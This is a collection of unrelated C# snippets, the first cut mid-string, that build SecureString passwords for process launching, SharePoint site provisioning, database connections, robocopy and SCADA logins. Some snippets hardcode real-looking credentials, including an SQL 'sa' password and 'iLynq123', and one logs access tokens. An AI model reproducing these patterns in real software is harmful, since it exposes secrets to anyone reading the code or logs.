a`\\=o=o=o=(`\\ /"); Console.WriteLine(" '. a 4/`|.-\"\"'`\\ \\ ;'`) .---."); Console.WriteLine(" \\ .' / .--' |_.' / .-._)"); Console.WriteLine(" `) _.' / /`-.__.' /"); Console.WriteLine(" `'-.____; /'-.___.-'"); Console.WriteLine(" `\"\"\"`')"); Console.BackgroundColor = ConsoleColor.Green; Console.ReadKey(); }
public static string Cmd(string inputStr, ExecCmdMode execCmdMode, string domainName, string useName, string password) { var process = new Process(); process.StartInfo.FileName = "cmd.exe"; process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardInput = true; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.RedirectStandardError = true; process.StartInfo.WindowStyle = ProcessWindowStyle.Normal; //process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;//does not function, the windows shown or hidden depends on "process.StartInfo.CreateNoWindow" var returnOutput = false; if (execCmdMode == ExecCmdMode.AsyncWindow) { inputStr = "start .\\Resources\\start.bat " + inputStr; process.StartInfo.CreateNoWindow = true; returnOutput = false; } else if (execCmdMode == ExecCmdMode.SyncWindow) { inputStr = "start .\\Resources\\start.bat " + inputStr; process.StartInfo.CreateNoWindow = true; returnOutput = true; } else if (execCmdMode == ExecCmdMode.NoWindow) { process.StartInfo.CreateNoWindow = true; returnOutput = false; } else if (execCmdMode == ExecCmdMode.NoWindowWithOutput) { process.StartInfo.CreateNoWindow = true; returnOutput = true; } else if (execCmdMode == ExecCmdMode.EmptyWindow) { process.StartInfo.CreateNoWindow = false; //when CreateNoWindow = false, popup a empty cmd window, no any exec result appears. returnOutput = false; } else if (execCmdMode == ExecCmdMode.EmptyWindowWithOutput) { process.StartInfo.CreateNoWindow = false; returnOutput = true; } process.StartInfo.Domain = domainName; process.StartInfo.UserName = useName; var pw = new System.Security.SecureString(); foreach (var v in password.ToCharArray()) { pw.AppendChar(v); } process.StartInfo.Password = pw; try { process.Start(); process.StandardInput.WriteLine(inputStr); process.StandardInput.WriteLine("exit"); var outputStr = ""; if (returnOutput) { outputStr = process.StandardOutput.ReadToEnd(); } process.WaitForExit(); process.Close(); return(outputStr); } catch (Exception ex) { throw new ArgumentException("\n>> " + TypeName + ".Cmd Error: " + ex.Message); } }
public static async Task <HttpResponseMessage> Run([HttpTrigger(AuthorizationLevel.Function, "get", "post", Route = null)] HttpRequestMessage req, TraceWriter log) { log.Info("C# HTTP trigger function processed a request."); if (adminPassword == null) { // This is the part where I grab the secret. var azureServiceTokenProvider = new AzureServiceTokenProvider(); log.Info("Getting the secret."); var kvClient = new KeyVaultClient(new KeyVaultClient.AuthenticationCallback(azureServiceTokenProvider.KeyVaultTokenCallback)); log.Info("KeyVaultSecret: " + Environment.GetEnvironmentVariable("KeyVaultSecret")); adminPassword = (await kvClient.GetSecretAsync(Environment.GetEnvironmentVariable("KeyVaultSecret"))).Value; } // parse query parameter string name = req.GetQueryNameValuePairs() .FirstOrDefault(q => string.Compare(q.Key, "name", true) == 0) .Value; // Get request body dynamic data = await req.Content.ReadAsAsync <object>(); // Set name to query string or body data name = name ?? data?.name; string title = data?.title; string siteUrl = string.Empty; string adminUser = Environment.GetEnvironmentVariable("spAdminUser"); log.Info("adminUser: "******"spSite"); log.Info("spSite: " + adminUser); System.Security.SecureString secureString = new System.Security.SecureString(); foreach (char ch in adminPassword) { secureString.AppendChar(ch); } string sitesRequest = Environment.GetEnvironmentVariable("listName"); log.Info("listName: " + sitesRequest); Dictionary <string, string> siteInfo = new Dictionary <string, string>(); OfficeDevPnP.Core.AuthenticationManager authManager = new OfficeDevPnP.Core.AuthenticationManager(); string camlQuery = "<View>" + "<Query>" + "<Where>" + "<Eq>" + "<FieldRef Name='Status' />" + "<Value Type='Choice'>Approved</Value>" + "</Eq>" + "</Where>" + "</Query>" + "<RowLimit>1</RowLimit>" + "</View>"; CamlQuery cq = new CamlQuery(); cq.ViewXml = camlQuery; using (var context = authManager.GetSharePointOnlineAuthenticatedContextTenant(spSite, adminUser, secureString)) { List list = context.Web.Lists.GetByTitle(sitesRequest); ListItemCollection lic = list.GetItems(cq); context.Load(lic); context.ExecuteQuery(); foreach (ListItem item in lic) { siteInfo.Add("Id", item["ID"].ToString()); siteInfo.Add("title", item["Title"].ToString()); siteInfo.Add("owner", item["Owner"].ToString()); siteInfo.Add("description", item["Description"] == null ? "" : item["Description"].ToString()); siteInfo.Add("type", item["SiteType"].ToString()); siteInfo.Add("alias", item["Alias"].ToString()); log.Info("Processing: " + item["Title"].ToString()); var siteType = siteInfo["type"]; switch (siteType.ToLower()) { case "communicationsite": var ctx = context.CreateSiteAsync(new CommunicationSiteCollectionCreationInformation { Title = siteInfo["title"].ToString(), Owner = siteInfo["owner"].ToString(), Lcid = 1033, Description = siteInfo["description"].ToString(), Url = spSite + "/sites/" + siteInfo["alias"].ToString(), }).GetAwaiter().GetResult(); // Add OWner User user = ctx.Web.EnsureUser(siteInfo["owner"].ToString()); ctx.Web.Context.Load(user); ctx.Web.Context.ExecuteQueryRetry(); ctx.Web.AssociatedOwnerGroup.Users.AddUser(user); ctx.Web.AssociatedOwnerGroup.Update(); ctx.Web.Context.ExecuteQueryRetry(); break; case "teamsite": var ctxTeamsite = context.CreateSiteAsync(new TeamSiteCollectionCreationInformation { DisplayName = siteInfo["title"].ToString(), Description = siteInfo["description"].ToString(), Alias = siteInfo["alias"].ToString(), IsPublic = false, }).GetAwaiter().GetResult(); siteUrl = ctxTeamsite.Url; // Add OWner User userTeamSite = ctxTeamsite.Web.EnsureUser(siteInfo["owner"].ToString()); ctxTeamsite.Web.Context.Load(userTeamSite); ctxTeamsite.Web.Context.ExecuteQueryRetry(); ctxTeamsite.Web.AssociatedOwnerGroup.Users.AddUser(userTeamSite); ctxTeamsite.Web.AssociatedOwnerGroup.Update(); ctxTeamsite.Web.Context.ExecuteQueryRetry(); break; case "teams": string token = Graph.getToken(); log.Info("Access Token: " + token); string userId = string.Empty; string groupId = string.Empty; if (string.IsNullOrEmpty(token) == false) { userId = Graph.getUser(token, siteInfo["owner"].ToString()); log.Info("userId: " + userId); } if (string.IsNullOrEmpty(userId) == false) { string dataPost = "{ 'displayName': '" + siteInfo["title"].ToString() + "', 'groupTypes': ['Unified'], 'mailEnabled': true, 'mailNickname': '" + siteInfo["alias"].ToString().Replace("\r\n", "").Replace(" ", "") + "', 'securityEnabled': false, '*****@*****.**': ['" + userId + "'], 'visibility': 'Private' }"; groupId = Graph.createUnifiedGroup(token, dataPost); log.Info("userId: " + groupId); //Graph.addOwnerToUnifiedGroup(token, groupId, userId); //removeOwnerToUnifiedGroup(token, groupId, userId); } siteUrl = siteInfo["title"].ToString(); log.Info("Teams ready: " + siteUrl); break; } // When the site or Teams has been created the status of the list item will change in ready if (siteUrl != string.Empty) { item["Status"] = "Ready"; item.Update(); context.ExecuteQuery(); } } } return(siteUrl == null ? req.CreateResponse(HttpStatusCode.InternalServerError, "Something went wrong!") : req.CreateResponse(HttpStatusCode.OK, siteUrl)); }
public LoginResult GetCharacterChallenge(bool sisi, out Token accessToken) { // need SecureCharacterName. if (SecureCharacterName == null || SecureCharacterName.Length == 0) { DecryptCharacterName(true); if (SecureCharacterName == null || SecureCharacterName.Length == 0) { Windows.CharacterChallengeWindow ccw = new Windows.CharacterChallengeWindow(this); bool?result = ccw.ShowDialog(); if (string.IsNullOrWhiteSpace(ccw.CharacterName)) { // CharacterName is required, sorry dude accessToken = null; // SecurePassword = null; SecureCharacterName = null; return(LoginResult.InvalidCharacterChallenge); } SecureCharacterName = new System.Security.SecureString(); foreach (char c in ccw.CharacterName) { SecureCharacterName.AppendChar(c); } SecureCharacterName.MakeReadOnly(); EncryptCharacterName(); App.Settings.Store(); } } string uri = ""; if (sisi) { uri = ""; } HttpWebRequest req = (HttpWebRequest)HttpWebRequest.Create(uri); req.Timeout = 30000; req.AllowAutoRedirect = true; if (!sisi) { req.Headers.Add("Origin", ""); } else { req.Headers.Add("Origin", ""); } req.Referer = uri; req.CookieContainer = Cookies; req.Method = "POST"; req.ContentType = "application/x-www-form-urlencoded"; using (SecureBytesWrapper body = new SecureBytesWrapper()) { byte[] body1 = Encoding.ASCII.GetBytes(String.Format("RememberCharacterChallenge={0}&Challenge=", "true")); using (SecureStringWrapper ssw = new SecureStringWrapper(SecureCharacterName, Encoding.ASCII)) { using (SecureBytesWrapper escapedCharacterName = new SecureBytesWrapper()) { escapedCharacterName.Bytes = System.Web.HttpUtility.UrlEncodeToBytes(ssw.ToByteArray()); body.Bytes = new byte[body1.Length + escapedCharacterName.Bytes.Length]; System.Buffer.BlockCopy(body1, 0, body.Bytes, 0, body1.Length); System.Buffer.BlockCopy(escapedCharacterName.Bytes, 0, body.Bytes, body1.Length, escapedCharacterName.Bytes.Length); } } req.ContentLength = body.Bytes.Length; try { using (Stream reqStream = req.GetRequestStream()) { reqStream.Write(body.Bytes, 0, body.Bytes.Length); } } catch (System.Net.WebException e) { switch (e.Status) { case WebExceptionStatus.Timeout: { accessToken = null; return(LoginResult.Timeout); } default: throw; } } } return(GetAccessToken(sisi, req, out accessToken)); }
// TODO: Execute main code in a async task. static void Main(string[] args) { bool acceptAny = false; bool allowRegistration = false; ushort port = 3221; #region Read command line params for (int i = 0; i < args.Length; ++i) { var arg = args[i]; if (!arg.StartsWith("-", StringComparison.Ordinal) && !arg.StartsWith("/", StringComparison.Ordinal)) { Console.WriteLine("Parameters must start with '-' or '/'. Use '-?' to show help."); return; } if (arg.Length == 1) { continue; } arg = arg.Substring(1, arg.Length - 1); if (arg == "acceptany") { acceptAny = true; continue; } else if (arg.StartsWith("port=")) { var spl = arg.Split('='); if (spl.Length != 2 || !ushort.TryParse(spl[1], out port)) { Console.WriteLine("Error in parameter 'port'"); return; } } else { Console.WriteLine( "Access Battle Server\r\n\r\n" + "Usage: AccessBattleServer [-acceptany] [-port=3221]\r\n" + "\r\nOptions:\r\n" + "\t-port=3221 Define the port to use. Default: 3221\r\n" + "\t-acceptany Accept any client. Disables user database.\r\n" + "\t Clients will not require a password." + "\r\nUsing '/' instead of '-' is allowed.\r\n" ); return; } } #endregion Log.SetMode(LogMode.Console); Log.Priority = LogPriority.Information; // Create userdb folder if not existing IUserDatabaseProvider db = null; if (!acceptAny) { Console.WriteLine("=============="); Console.WriteLine("Database Setup"); Console.WriteLine("=============="); var plugins = PluginHandler.Instance.GetPlugins <IUserDatabaseProviderFactory>(); if (plugins.Count == 0) { Console.WriteLine("No database plugin found."); } Console.WriteLine("Please select an option:\r\n"); Console.WriteLine("\t1: Accept any client (no database)"); Console.WriteLine("\t2: Text based database"); for (int i = 0; i < plugins.Count; ++i) { Console.WriteLine("\t" + (i + 3) + ": " + plugins[i].Metadata.Description); } Console.WriteLine("\r\nEnter the number of the option."); if (int.TryParse(Console.ReadLine(), out int ichoice) && ichoice > 0 && ichoice <= plugins.Count + 2) { if (ichoice == 1) { acceptAny = true; } else if (ichoice == 2) { db = new TextFileUserDatabaseProvider(); } else { db = plugins[ichoice - 3].CreateInstance(); } if (!acceptAny) { Console.WriteLine("\r\nAre users allowed to create accounts?"); Console.WriteLine("Please select an option:\r\n"); Console.WriteLine("\t1: No"); Console.WriteLine("\t2: Yes"); if (int.TryParse(Console.ReadLine(), out int jchoice) && jchoice > 0 && jchoice < 3) { if (jchoice == 2) { allowRegistration = true; } } else { Console.WriteLine("Invalid choice! Selecting option 'No'."); } } } else { Console.WriteLine("Invalid choice! Server will exit."); return; } } try { if (!acceptAny) // Have to check again { try { Console.WriteLine("\r\n" + db.ConnectStringHint); var connectString = Console.ReadLine(); if (!db.Connect(connectString).GetAwaiter().GetResult()) { Log.WriteLine(LogPriority.Error, "Connecting to database failed. Server will exit."); return; } Console.WriteLine(); } catch (Exception e) { Log.WriteLine(LogPriority.Error, "Error setting up database: " + e.Message); Console.WriteLine("Server will exit."); return; } } _server = new GameServer(port, db) { AcceptAnyClient = acceptAny, AllowRegistration = allowRegistration }; try { _server.Start(); } catch (Exception e) { Console.WriteLine("Error: " + e.Message); Console.WriteLine("Server will exit."); return; } Console.WriteLine("Game Server started"); if (acceptAny) { Console.WriteLine("! Any client is accepted"); } if (allowRegistration) { Console.WriteLine("! Any client can create an account"); } Console.WriteLine("Type 'help' to show available commands"); string line; while ((line = Console.ReadLine()) != "exit") { bool ok = false; line = line.Trim(); if (line == ("help")) { Console.WriteLine( "\texit Close this program.\r\n" + "\tlist List all games\r\n" + "\tadd user n p elo Adds user 'u' with password 'p'. elo is optional ELO rating (default:1000) \r\n" + "\tmcpw user Check if user must change password\r\n" + "\tset elo user elo Set ELO rating for user\r\n" + "\tget elo user Get ELO rating for user\r\n" + "\tdebug Debug command. Requires additional parameters:\r\n" + "\t win key=1234 1 Let player 1 win. Uses game key.\r\n" + "\t win name=gameX 2 Let player 2 win. Uses game name."); ok = true; } else if (line == ("list")) { var games = _server.Games.ToList(); if (games.Count == 0) { Console.WriteLine("There are no games");; } else { foreach (var game in games) { Console.WriteLine(game.Key + " - " + game.Value.Name); } } ok = true; } else if (line.StartsWith("set")) { if (line.StartsWith("set elo")) { if (db == null) { continue; } var sp = line.Split(' '); if (sp.Length == 4) { int elo; if (int.TryParse(sp[3], out elo)) { if (db.SetELO(sp[2], elo).GetAwaiter().GetResult()) { ok = true; } } } } } else if (line.StartsWith("get")) { if (line.StartsWith("get elo")) { if (db == null) { continue; } var sp = line.Split(' '); if (sp.Length == 3) { var elo = db.GetELO(sp[2]).GetAwaiter().GetResult(); if (elo != null) { Console.WriteLine("ELO: " + elo); ok = true; } } } } else if (line.StartsWith("mcpw")) { if (db == null) { continue; } var sp = line.Split(' '); if (sp.Length == 2) { bool?res = db.MustChangePasswordAsync(sp[1]).GetAwaiter().GetResult(); if (res == true) { Console.WriteLine("User must change password"); ok = true; } else if (res == false) { Console.WriteLine("User must not change password"); ok = true; } } } else if (line.StartsWith("debug ", StringComparison.Ordinal)) { var sp = line.Split(' '); if (sp.Length == 4) { if (sp[1] == "win") { uint k = 0; var spx = sp[2].Split('='); if (spx.Length != 2) { continue; } if (spx[0] == "key") { if (!uint.TryParse(spx[1], out k)) { continue; } } else if (spx[0] == "name") { k = _server.Games.FirstOrDefault(o => o.Value.Name == spx[1]).Key; } if (k == 0) { continue; } int p; if (!int.TryParse(sp[3], out p)) { continue; } _server.Win(p, k); ok = true; } } } else if (line.StartsWith("add user ", StringComparison.Ordinal)) { if (db == null) { continue; } var spl = line.Split(' '); if (spl.Length == 4 || spl.Length == 5) { int elo = 1000; if (spl.Length == 5 && !int.TryParse(spl[4], out elo)) { elo = 1000; } if (elo < 0) { elo = 0; } if (elo > 10000) { elo = 10000; } var pw = new System.Security.SecureString(); foreach (var c in spl[3]) { pw.AppendChar(c); } if (db.AddUserAsync(spl[2], pw, elo, true).GetAwaiter().GetResult()) { Console.WriteLine("user added"); } else { Console.WriteLine("add failed"); } ok = true; } } if (!ok) { Console.WriteLine("error"); } } } finally { Log.WriteLine(LogPriority.Information, "Stopping Server..."); _server?.Stop(); db?.Disconnect(); #if DEBUG Console.WriteLine("Press any key to exit..."); Console.ReadKey(); #endif Log.WriteLine(LogPriority.Information, "Game Server stopped"); } }
static void Main(string[] args) { string connectString = @"Server=.\DESKTOP-QBVP6A5;Database=CSharp_SQL;User ID=sa;Password=@wangshu1715$"; System.Security.SecureString secureStr = new System.Security.SecureString(); secureStr.AppendChar('@'); secureStr.AppendChar('w'); secureStr.AppendChar('a'); secureStr.AppendChar('n'); secureStr.AppendChar('g'); secureStr.AppendChar('s'); secureStr.AppendChar('h'); secureStr.AppendChar('u'); secureStr.AppendChar('1'); secureStr.AppendChar('7'); secureStr.AppendChar('1'); secureStr.AppendChar('5'); secureStr.AppendChar('$'); SqlConnection conn = new SqlConnection(connectString); conn.Open(); Console.ReadKey(); }
// Alarm acknowledgement private bool TryAlarmAck(string UserId, string PIN, long Cookie, string Phone) { // Log on to the .Net Client API with these details // This requires a Reference from the project to this dll ClearScada.Client.Simple.Connection connection; var node = new ClearScada.Client.ServerNode(ClearScada.Client.ConnectionType.Standard, "", 5481); ((DrvNotifyChannel)this.Channel).LogAndEvent("Acknowledge - connection created."); connection = new ClearScada.Client.Simple.Connection("Notify"); try { ((DrvNotifyChannel)this.Channel).LogAndEvent("Acknowledge - connecting."); connection.Connect(node); } catch (CommunicationsException) { ((DrvNotifyChannel)this.Channel).LogAndEvent("Ack request - Unable to log in to ClearSCADA server using UserId and PIN."); return(false); } if (!connection.IsConnected) { ((DrvNotifyChannel)this.Channel).LogAndEvent("Acknowledge - failed connection."); return(false); } using (var spassword = new System.Security.SecureString()) { foreach (var c in PIN) { spassword.AppendChar(c); } try { ((DrvNotifyChannel)this.Channel).LogAndEvent("Acknowledge - logging in."); connection.LogOn(UserId, spassword); } catch (AccessDeniedException) { ((DrvNotifyChannel)this.Channel).LogAndEvent("Ack request - Access denied, incorrect user Id or PIN."); return(false); } catch (PasswordExpiredException) { ((DrvNotifyChannel)this.Channel).LogAndEvent("Ack request - credentials expired."); return(false); } } // Get root object ClearScada.Client.Simple.DBObject root = null; try { ((DrvNotifyChannel)this.Channel).LogAndEvent("Acknowledge - get database object."); root = connection.GetObject("$Root"); } catch (Exception e) { ((DrvNotifyChannel)this.Channel).LogAndEvent("Ack request - Cannot get root object. " + e.Message); return(false); } object[] parameters = new object[2]; parameters[0] = Cookie; parameters[1] = "By Phone"; // Try acknowledging alarm try { ((DrvNotifyChannel)this.Channel).LogAndEvent("Acknowledge - accepting by cookie."); root.InvokeMethod("AcceptAlarmByCookie", parameters); } catch (Exception e) { ((DrvNotifyChannel)this.Channel).LogAndEvent("Ack request - Cannot acknowledge. " + e.Message); return(false); } return(true); }
public Task Start(string domain = "", string username = "", string password = "") { Debugger.Instance.DebugMessage("RoboCommand started execution."); hasError = false; isRunning = true; var tokenSource = new CancellationTokenSource(); CancellationToken cancellationToken = tokenSource.Token; resultsBuilder = new Results.ResultsBuilder(); results = null; // make sure source path is valid if (!Directory.Exists(CopyOptions.Source)) { Debugger.Instance.DebugMessage("The Source directory does not exist."); hasError = true; OnCommandError?.Invoke(this, new CommandErrorEventArgs("The Source directory does not exist.")); Debugger.Instance.DebugMessage("RoboCommand execution stopped due to error."); tokenSource.Cancel(true); } #region Create Destination Directory try { var dInfo = Directory.CreateDirectory(CopyOptions.Destination); if (!dInfo.Exists) { Debugger.Instance.DebugMessage("The destination directory does not exist."); hasError = true; OnCommandError?.Invoke(this, new CommandErrorEventArgs("The Destination directory is invalid.")); Debugger.Instance.DebugMessage("RoboCommand execution stopped due to error."); tokenSource.Cancel(true); } } catch (Exception ex) { Debugger.Instance.DebugMessage(ex.Message); hasError = true; OnCommandError?.Invoke(this, new CommandErrorEventArgs("The Destination directory is invalid.")); Debugger.Instance.DebugMessage("RoboCommand execution stopped due to error."); tokenSource.Cancel(true); } #endregion backupTask = Task.Factory.StartNew(() => { cancellationToken.ThrowIfCancellationRequested(); process = new Process(); if (!string.IsNullOrEmpty(domain)) { Debugger.Instance.DebugMessage(string.Format("RoboCommand running under domain - {0}", domain)); process.StartInfo.Domain = domain; } if (!string.IsNullOrEmpty(username)) { Debugger.Instance.DebugMessage(string.Format("RoboCommand running under username - {0}", username)); process.StartInfo.UserName = username; } if (!string.IsNullOrEmpty(password)) { Debugger.Instance.DebugMessage("RoboCommand password entered."); var ssPwd = new System.Security.SecureString(); for (int x = 0; x < password.Length; x++) { ssPwd.AppendChar(password[x]); } process.StartInfo.Password = ssPwd; } Debugger.Instance.DebugMessage("Setting RoboCopy process up..."); process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.RedirectStandardError = true; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.StartInfo.CreateNoWindow = true; process.StartInfo.FileName = Configuration.RoboCopyExe; process.StartInfo.Arguments = GenerateParameters(); process.OutputDataReceived += process_OutputDataReceived; process.ErrorDataReceived += process_ErrorDataReceived; process.EnableRaisingEvents = true; process.Exited += Process_Exited; Debugger.Instance.DebugMessage("RoboCopy process started."); process.Start(); process.BeginOutputReadLine(); process.BeginErrorReadLine(); process.WaitForExit(); results = resultsBuilder.BuildResults(process?.ExitCode ?? -1); Debugger.Instance.DebugMessage("RoboCopy process exited."); }, cancellationToken, TaskCreationOptions.LongRunning, PriorityScheduler.BelowNormal); Task continueWithTask = backupTask.ContinueWith((continuation) => { if (!hasError) { // backup is complete if (OnCommandCompleted != null) { OnCommandCompleted(this, new RoboCommandCompletedEventArgs(results)); isRunning = false; } } Stop(); }, cancellationToken); return(continueWithTask); }
/* * Method: RunScript * Purpose: Creates two shared datasources on report server in home folder, by invoking powershell runspace * Parameters: sctipt string, int mode 1 - create ERP datasource 2 - create LYNQ datasource, reporting server URL as a string, server name as a string, database name as a string, * user name as a string, password as a string * Return: void */ public static void RunScript(string scriptText, int mode, string txtReportingServerURL, string txtServer, string txtDatabase, string txtUserName, string txtPassword) { // create Powershell runspace Runspace runspace = RunspaceFactory.CreateRunspace(); // open it runspace.Open(); // create a pipeline and feed it the script text Pipeline pipeline = runspace.CreatePipeline(); pipeline.Commands.AddScript(scriptText); pipeline.Invoke(); pipeline.Commands.Clear(); Command myCommand = new Command("New-SSRSDataSource"); if (mode == 1) { CommandParameter dsName = new CommandParameter("DataSourceName", "LYNQmomERP"); myCommand.Parameters.Add(dsName); CommandParameter dsPath = new CommandParameter("path", "/"); myCommand.Parameters.Add(dsPath); CommandParameter dsReportWebService = new CommandParameter("reportWebService", txtReportingServerURL); myCommand.Parameters.Add(dsReportWebService); CommandParameter dsConnectionString = new CommandParameter("connectString", "Data Source = " + txtServer + "; Initial Catalog = " + txtDatabase); myCommand.Parameters.Add(dsConnectionString); } else { CommandParameter dsName = new CommandParameter("DataSourceName", "LYNQmom"); myCommand.Parameters.Add(dsName); CommandParameter dsPath = new CommandParameter("path", "/"); myCommand.Parameters.Add(dsPath); CommandParameter dsReportWebService = new CommandParameter("reportWebService", txtReportingServerURL); myCommand.Parameters.Add(dsReportWebService); CommandParameter dsConnectionString = new CommandParameter("connectString", "Data Source = " + txtServer + "; Initial Catalog = " + txtDatabase); myCommand.Parameters.Add(dsConnectionString); } CommandParameter dsUserName = new CommandParameter("username", txtUserName); myCommand.Parameters.Add(dsUserName); CommandParameter dsPassword = new CommandParameter("password", txtPassword); myCommand.Parameters.Add(dsPassword); CommandParameter dsExtension = new CommandParameter("Extension", "SQL"); myCommand.Parameters.Add(dsExtension); string passwordString = "iLynq123"; // create credential variable for connection to ssrs server System.Security.SecureString password = new System.Security.SecureString(); for (int i = 0; i < passwordString.Length; i++) { password.AppendChar(passwordString[i]); } password.MakeReadOnly(); PSCredential Credential = new PSCredential("iLynq", password); CommandParameter dsCredentials = new CommandParameter("credentials", Credential); myCommand.Parameters.Add(dsCredentials); Pipeline pipeline1 = runspace.CreatePipeline(); pipeline1.Commands.Add(myCommand); try { pipeline1.Invoke(); } catch (System.Management.Automation.CmdletInvocationException ex) { MessageBox.Show("Ivalid URL format", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); } // close the runspace runspace.Close(); }
static void Main(string[] args) { //checkThumbnailFiles(); //checkReporterPhotos(); //checkVideoCategoryPhotos(); //checkVideoFiles(); Console.WriteLine("Start"); try { Console.WriteLine("Start 1"); var context = new VITVContext(); Console.WriteLine(context.Videos.Count()); foreach (var video in context.Videos) { if (video.Duration.TotalSeconds != 0) { break; } Console.WriteLine(video.Url); var videoPath = GetPhysicalPath(video.Url); Console.WriteLine(videoPath); if (videoPath != "") { string ffMPEG = @"\\\web\FFmpeg\ffmpeg.exe"; string username = "******"; string password = "******"; System.Security.SecureString ssPwd = new System.Security.SecureString(); for (int x = 0; x < password.Length; x++) { ssPwd.AppendChar(password[x]); } string vArgs = string.Format("-i \"{0}\"", videoPath); var thumbProc = new Process { StartInfo = { FileName = ffMPEG, Arguments = vArgs, UseShellExecute = false, CreateNoWindow = true, UserName = username, Password = ssPwd, LoadUserProfile = false, RedirectStandardOutput = false, WorkingDirectory = Path.GetDirectoryName(videoPath), //important: RedirectStandardError = true } }; try { thumbProc.Start(); var SROutput = thumbProc.StandardError; var outPut = SROutput.ReadToEnd(); var re = new System.Text.RegularExpressions.Regex("[D|d]uration:.((\\d|:|\\.)*)"); var m = re.Match(outPut); thumbProc.WaitForExit(); thumbProc.Close(); if (m.Success) { //Means the output has cantained the string "Duration" string temp = m.Groups[1].Value; string[] timepieces = temp.Split(new char[] { ':', '.' }); if (timepieces.Length == 4) { // Store duration var videoDuration = new TimeSpan(0, Convert.ToInt16(timepieces[0]), Convert.ToInt16(timepieces[1]), Convert.ToInt16(timepieces[2]), Convert.ToInt16(timepieces[3])); video.Duration = videoDuration; } } } catch (Exception ex) { Console.WriteLine("Error: " + ex.Message); } } Console.WriteLine(video.Id); } context.SaveChanges(); } catch (Exception ex) { Console.WriteLine("Error: " + ex.Message); } Console.WriteLine("Completed"); Console.ReadLine(); }
public void Start(string domain = "", string username = "", string password = "") { hasError = false; // make sure source path is valid if (!Directory.Exists(CopyOptions.Source.Replace("\"", ""))) { hasError = true; if (OnCommandError != null) { OnCommandError(this, new ErrorEventArgs("The Source directory does not exist.")); } return; } #region Create Destination Directory try { var dInfo = Directory.CreateDirectory(CopyOptions.Destination.Replace("\"", "")); if (!dInfo.Exists) { hasError = true; if (OnCommandError != null) { OnCommandError(this, new ErrorEventArgs("The Destination directory is invalid.")); } return; } } catch { hasError = true; if (OnCommandError != null) { OnCommandError(this, new ErrorEventArgs("The Destination directory is invalid.")); } return; } #endregion backupTask = Task.Run(() => { process = new Process(); if (!string.IsNullOrEmpty(domain)) { process.StartInfo.Domain = domain; } if (!string.IsNullOrEmpty(username)) { process.StartInfo.UserName = username; } if (!string.IsNullOrEmpty(password)) { var ssPwd = new System.Security.SecureString(); for (int x = 0; x < password.Length; x++) { ssPwd.AppendChar(password[x]); } process.StartInfo.Password = ssPwd; } process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.RedirectStandardError = true; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.StartInfo.CreateNoWindow = true; process.StartInfo.FileName = "ROBOCOPY.exe"; process.StartInfo.Arguments = GenerateParameters(); process.OutputDataReceived += process_OutputDataReceived; process.ErrorDataReceived += process_ErrorDataReceived; process.Start(); process.BeginOutputReadLine(); process.BeginErrorReadLine(); process.WaitForExit(); }); backupTask.ContinueWith((continuation) => { if (!hasError) { // backup is complete if (OnCommandCompleted != null) { OnCommandCompleted(this, new RoboCommandCompletedEventArgs()); } } Stop(); }); }
public void SetInactiveCollectionAdConfigTest() { SetAzureRemoteAppCollection mockCmdlet = SetUpTestCommon<SetAzureRemoteAppCollection>(); string collectionName = "mycol"; System.Security.SecureString password = new System.Security.SecureString(); string expectedTrackingId = "fasdfsadfsdf"; CollectionUpdateDetails requestData = null; string userName = @"MyDomain\Administrator"; Collection expectedCollection = null; // Required parameters for this test mockCmdlet.CollectionName = collectionName; password.AppendChar('f'); mockCmdlet.Credential = new PSCredential(userName, password); requestData = new CollectionUpdateDetails() { AdInfo = new ActiveDirectoryConfig() { UserName = userName, Password = "******" } }; expectedCollection = new Collection() { Name = collectionName, Status = "Inactive", AdInfo = new ActiveDirectoryConfig() }; PerformCollectionTestWithAdInfoHelper(mockCmdlet, collectionName, expectedCollection, expectedTrackingId, requestData, true); }
/// <summary>Performs execution of the command, working asynchronously if required.</summary> /// <returns> /// A <see cref="System.Threading.Tasks.Task" /> that will be complete when handling of the method is completed. /// </returns> protected async System.Threading.Tasks.Task ProcessRecordAsync() { using ( NoSynchronizationContext ) { await((Microsoft.Rest.ClientRuntime.IEventListener) this).Signal(Microsoft.Rest.ClientRuntime.Events.CmdletGetPipeline); if (((Microsoft.Rest.ClientRuntime.IEventListener) this).Token.IsCancellationRequested) { return; } if (this.SkipSSL.ToBool()) { Pipeline = Nutanix.Powershell.Module.Instance.CreatePipelineWithProxy(this.MyInvocation.BoundParameters); } else { Pipeline = Nutanix.Powershell.Module.Instance.CreatePipeline(this.MyInvocation.BoundParameters); } Pipeline.Prepend(HttpPipelinePrepend); Pipeline.Append(HttpPipelineAppend); if (Credential == null) { if (Port == null) { Port = System.Environment.GetEnvironmentVariable("NutanixPort") ?? "9440"; } if (Protocol == null) { Protocol = System.Environment.GetEnvironmentVariable("NutanixProtocol") ?? "https"; } if (Server == null) { Server = System.Environment.GetEnvironmentVariable("NutanixServer") ?? "localhost"; } if (Username == null) { Username = System.Environment.GetEnvironmentVariable("NutanixUsername") ?? ""; } if (Password == null) { var psw = System.Environment.GetEnvironmentVariable("NutanixPassword") ?? ""; System.Security.SecureString result = new System.Security.SecureString(); foreach (char c in psw) { result.AppendChar(c); } Password = result; } //build url var url = $"{Protocol}://{Server}:{Port}"; Credential = new Nutanix.Powershell.Models.NutanixCredential(url, Username, Password); } // get the client instance await((Microsoft.Rest.ClientRuntime.IEventListener) this).Signal(Microsoft.Rest.ClientRuntime.Events.CmdletBeforeAPICall); if (((Microsoft.Rest.ClientRuntime.IEventListener) this).Token.IsCancellationRequested) { return; } await this.Client.ListSubnets(GetEntitiesRequest, onOK, onDefault, this, Pipeline, Credential); await((Microsoft.Rest.ClientRuntime.IEventListener) this).Signal(Microsoft.Rest.ClientRuntime.Events.CmdletAfterAPICall); if (((Microsoft.Rest.ClientRuntime.IEventListener) this).Token.IsCancellationRequested) { return; } } }
